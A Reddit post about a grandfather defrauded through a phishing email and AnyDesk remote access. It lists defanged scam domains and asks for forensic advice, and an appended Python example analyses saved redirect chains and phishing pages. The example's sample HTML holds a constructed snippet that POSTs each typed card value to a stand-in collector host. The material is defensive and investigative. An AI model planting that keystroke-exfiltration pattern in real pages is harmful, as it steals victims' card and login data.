u/Effective_Bag5980

My grandpa lost €20,000 in a phishing + AnyDesk scam, looking for OSINT/forensics advice

Hi all,

My grandpa was the victim of a phishing scam on 15/05/2026, and the scammers managed to steal around €20,000. I am trying to gather as much information as possible for the police and the banks, and I would really appreciate help from people with OSINT, phishing-analysis, or malware/forensics experience.

I am not asking anyone to harass, dox, or contact anyone. I am only looking for help identifying technical indicators, infrastructure, mistakes in the phishing setup, or useful evidence that could be passed on to the police, banks, AnyDesk, registrars, or hosting providers.

What happened:

I was passing by my grandparents today, 15/05/2026, and the first thing my grandma said was that there was something wrong with my granddad, something related to fraud. I immediately went over to him at his computer and saw all his bank cards lying on his desk while he was on the phone using the landline. He told me he could no longer access his bank accounts (firewall blocked by the fraudsters).

Right after that, he received another call on his smartphone. I picked up, and some guy told me he was from Bank X and that he had spoken to my grandpa regarding blocking his card. Meanwhile, my grandpa was still on the phone with someone else, also claiming to be from the same Bank X, and both of them were accusing each other of being the fraudster. I immediately dropped everything and called Card Stop to block all his cards. Afterwards, I called both banks where my granddad has an account to see what the damage was and to let them know, so that they could start a fraud case.

Because this happened on a Friday evening, the banks are now closed for the weekend. Since the cards are blocked, I cannot access his online banking anymore to see the transaction details, including the destination account. Without this information, the police cannot yet file a request to block the transaction or the receiving bank account. We now have to wait until Monday to go to the bank in person, which is ridiculous given the urgency of the situation.

I have gathered all the necessary information to move forward, including filing a police report. However, I would really like to find out more about the technical side of the scam, because I suspect the scammers may have made a mistake and left behind a trail. My knowledge in this area is limited, so I would really appreciate it if someone with experience in OSINT, phishing analysis, or digital forensics could help me identify useful evidence.

Phishing email:

My grandpa received a phishing email from a custom domain trying to copy a Belgian government application, more specifically My eBox.

The email was sent on 15/05/2026 at 05:25 GMT+2 from:

noreply@beheeruwebox[.]com

After doing a quick ICANN lookup for:

beheeruwebox[.]com

I saw that the domain was registered on 15/05/2026 at 04:21 GMT+2 through Namecheap.

Unfortunately, nowadays the personal information of the person who registers a domain is withheld. However, I am hoping that the Belgian police may be able to get a claim through the court to request this information from Namecheap. If the fraudster was lazy, he might have used his real credentials, and if not his real credentials, maybe his or her real credit card or another traceable payment method. You never know.

Phishing flow:

The phishing email convinced my grandpa that some amount of money had been credited to him regarding a holiday here in Belgium, but that the details regarding this were not fully completed yet. All bullshit, of course.

In the email, there was a button to go to “his profile” to complete this information. Behind this button was a hyperlink to:

ionsa[.]net

After clicking it, he was automatically redirected to:

vsaldjljsmlk[.]info

and finally to:

vlaamsburger[.]ovanmslalbe[.]com

This phishing website tried to copy the interface you would see on that Belgian government application. Here, my grandpa filled in his details, shortly after which he received a phone call from the fraudsters.

Domain observations:

After another quick ICANN lookup for:

ionsa[.]net

it shows that this domain is registered through publicdomainregistry[.]com, was created in 2008, and was updated in 2026. It contains some contact information, but I do not know what to think of that. It might be meaningful, but it could also be a hacked account or compromised domain.

I did the same for:

vsaldjljsmlk[.]info

This domain appears to be registered through Namecheap and was created on 15/05/2026 at 15:35 GMT+2. This is very weird, because the fraudsters made my grandpa install AnyDesk, and from the logs I was able to see a first remote connection at around 14:18 GMT+2. So maybe this redirect domain was added after the scam. Why? I do not know.

The same goes for:

ovanmslalbe[.]com

This domain also appears to be registered through Namecheap and was created on 15/05/2026 at 15:28 GMT+2.

However, when I put ionsa[.]net through a URL scan on urlscan[.]io, it reported vsaldjljsmlk[.]info as being around 40 minutes old at the time of writing this post, many hours after the scam. Perhaps this redirect domain gets refreshed constantly to avoid blocklists? That would clarify my earlier confusion.

My current guess is:

ionsa[.]net is used because it does not look like a scam domain at first sight. Maybe that helps prevent it from being flagged by the email client.

vsaldjljsmlk[.]info is then used as a throwaway redirect domain, in case it gets flagged or blocked.

ovanmslalbe[.]com hosts the actual phishing page, including the HTML and everything behind it, which would probably take more time to replace if it gets flagged.

But I am not sure whether this interpretation is correct.

Phishing website:

I briefly looked at their phishing website:

vlaamsburger[.]ovanmslalbe[.]com

It looks very poorly made. Most of the official-looking redirects that the real government application would normally have do not work. Because of that, I feel there must be some trails hidden there, maybe something in the HTML, JavaScript, forms, tracking code, or maybe a POST request that shows where the submitted information is being sent.

One thing I find interesting is that my grandpa insists that he did not press the final button to send the information. So I am curious how they were still able to get his information and call him. Maybe the site sends form data the moment you input a character in the fields?

AnyDesk / remote access:

After they called my grandpa, they told him there was a fraudulent transaction on his bank account due to a virus. Long story short, they made him install AnyDesk and then made him share or enter his bank details. They took over control, transferred the money, and afterwards showed him pictures of expensive perfume and luggage, claiming that this was what had been bought with the money that was transferred away due to the virus.

They then closed by saying that everything was okay now, that his card would be blocked, and that his money would be returned. Lowest scum on earth.

I have some logs from AnyDesk and have sent AnyDesk an email asking whether they can help, but I am not sure whether this will result in anything.

They also installed gcapi.dll, perhaps from the Connective signing extension plugin that was also installed in his Chrome browser. Furthermore, they installed Digipass and SignID, which I assume was to get his card or authentication process to work.

Other observations:

They also cleared the Chrome history and blocked the websites of both banks he has an account with in the firewall.

The AnyDesk logs say that the first connection was made at 14:18 GMT+2, while the first instance of AnyDesk in his browser/search history that I was able to recover was at 16:15 GMT+2. According to the recovered Google history, the scam continued until at least 19:44 GMT+2.

Again, I am not asking anyone to identify, harass, dox, or contact a private individual. I am only trying to collect useful technical indicators and evidence that can help the police, the banks, registrars, hosting providers, and AnyDesk take the appropriate action.

Once everything important has been preserved and documented, I will fully wipe his computer and reinstall it. However, before I do that, is there anything crucial I may have missed that should be checked, preserved, or reported as soon as possible?

Any advice, pointers, or help would be greatly appreciated. I know this is a lot of information, but even a small suggestion could be useful at this point.

reddit.com
u/Effective_Bag5980 — 6 days ago
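Added example (not from the post above, and not anything the poster ran): an offline way to document the two things the post asks about, the redirect chain (lure domain, throwaway redirector, hosting domain) and whether a captured landing page posts form data before the final button is pressed. All hostnames, the HTML sample and the `offline_fetch` responses below are constructed placeholders so it runs without touching any live site; in a real case you would feed it the HTML and redirect responses you already saved (for example from a urlscan result or a saved page), never by browsing to the site again from the victim's machine.

```python
"""Static evidence extraction for a phishing redirect chain and landing page.

Added example, not code from the original post. The fetch function is
injected so the analysis runs on saved responses; nothing here contacts a
live host. All hosts below use the reserved .invalid TLD and are constructed.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

MAX_HOPS = 10
# JS patterns that reveal where data is sent and whether it is sent per keystroke
FETCH_RE = re.compile(r'fetch\(\s*["\']([^"\']+)["\']')
XHR_RE = re.compile(r'\.open\(\s*["\'](?:GET|POST)["\']\s*,\s*["\']([^"\']+)["\']', re.I)
LISTENER_RE = re.compile(r'addEventListener\(\s*["\'](input|keyup|keydown|keypress|change)["\']')
KEYSTROKE_ATTRS = ("oninput", "onkeyup", "onkeydown", "onkeypress", "onchange")


def follow_redirects(start_url, fetch, max_hops=MAX_HOPS):
    """Walk HTTP redirects from saved responses, recording each hop as evidence.

    fetch(url) -> (status, headers_dict, body_str). Each hop records the host
    (what you report to a registrar) and a SHA-256 of the body (what you keep).
    """
    hops, seen, url = [], set(), start_url
    for _ in range(max_hops):
        if url in seen:  # loop guard: redirectors sometimes bounce back and forth
            break
        seen.add(url)
        status, headers, body = fetch(url)
        location = headers.get("Location")
        hops.append({"url": url, "host": urlparse(url).hostname, "status": status,
                     "location": location,
                     "sha256": hashlib.sha256(body.encode()).hexdigest()})
        if status in (301, 302, 303, 307, 308) and location:
            url = urljoin(url, location)  # relative Location headers are allowed
            continue
        break
    return hops


class _PageIndicators(HTMLParser):
    """Collects form targets, external scripts, inline JS and per-key handlers."""
    def __init__(self, base_url):
        super().__init__()
        self.base, self._in_script = base_url, False
        self.form_actions, self.script_srcs = [], []
        self.keystroke_handlers, self.inline_js = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute names are lowercased by HTMLParser
        if tag == "form":
            self.form_actions.append(urljoin(self.base, a.get("action") or ""))
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(urljoin(self.base, a["src"]))
        for name in KEYSTROKE_ATTRS:  # inline handlers that fire while typing
            if name in a:
                self.keystroke_handlers.append((tag, name, a[name]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)


def analyze_page(base_url, html):
    """Return the exfiltration indicators found in a saved landing page."""
    p = _PageIndicators(base_url)
    p.feed(html)
    js = "".join(p.inline_js)
    endpoints = {urljoin(base_url, m) for m in FETCH_RE.findall(js) + XHR_RE.findall(js)}
    return {"sha256": hashlib.sha256(html.encode()).hexdigest(),
            "form_actions": p.form_actions, "script_srcs": p.script_srcs,
            "keystroke_handlers": p.keystroke_handlers,
            "js_endpoints": sorted(endpoints),
            "live_listeners": sorted(set(LISTENER_RE.findall(js)))}


def investigate(start_url, fetch):
    """Chain walk plus analysis of the final (non-redirect) page."""
    hops = follow_redirects(start_url, fetch)
    final_url = hops[-1]["url"]
    return {"hops": hops, "page": analyze_page(final_url, fetch(final_url)[2])}


# Constructed sample: a page that posts a field's value on every keystroke,
# which is the behaviour that explains "I never pressed the final button".
SAMPLE_HTML = """<html><body>
<form id="login" action="/api/submit" method="post">
  <input name="card" oninput="leak(this.value)">
  <button type="submit">Send</button>
</form>
<script src="https://cdn.example.invalid/app.js"></script>
<script>
function leak(v) { fetch("https://collector.example.invalid/k", {method: "POST", body: v}); }
document.getElementById("login").addEventListener("input", function () {
  var x = new XMLHttpRequest(); x.open("POST", "/api/live"); x.send("partial");
});
</script></body></html>"""

CONSTRUCTED_HOPS = {  # lure -> throwaway redirector -> hosting domain
    "https://lure.example.invalid/profile": (302, {"Location": "https://hop.example.invalid/r"}, ""),
    "https://hop.example.invalid/r": (302, {"Location": "https://phish.example.invalid/login"}, ""),
    "https://phish.example.invalid/login": (200, {}, SAMPLE_HTML),
}


def offline_fetch(url):
    """Stand-in for saved responses; replace with your own captured data."""
    return CONSTRUCTED_HOPS[url]


if __name__ == "__main__":
    result = investigate("https://lure.example.invalid/profile", offline_fetch)
    for hop in result["hops"]:
        print(hop["status"], hop["host"], "->", hop["location"], hop["sha256"][:12])
    for key, value in result["page"].items():
        print(key, value)
```

The output is what a bank, registrar or police report can use: one hostname per hop with its role, the hash of each response so the copy you hand over can be matched later, the endpoints that receive submitted data (often on a different host than the page itself), and any `oninput`/`addEventListener("input", ...)` handler, which is the concrete evidence that data left the page before the submit button was ever pressed.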